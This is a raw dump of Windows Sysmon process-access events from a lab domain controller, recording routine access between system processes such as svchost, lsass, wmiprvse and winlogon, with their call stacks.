10341000x80000000000000009724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.243{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.243{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.196{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.196{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.165{59A5CD1D-8E46-6005-1600-00000000A301}15445084C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32
.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.133{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.133{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.118{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.118{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.118{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.946{59A5CD1D-8E46-6005-1600-00000000A301}15442272C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+2de4|c:\windows\system32\lsm.dll+57af|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2dce|c:\windows\system32\lsm.dll+57af|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000009987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+5f9d|c:\windows\system32\lsm.dll+57a4|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+2f9b|c:\windows\system32\lsm.dll+5727|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2f4d|c:\windows\system32\lsm.dll+5727|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000009981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+5f9d|c:\windows\system32\lsm.dll+5718|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 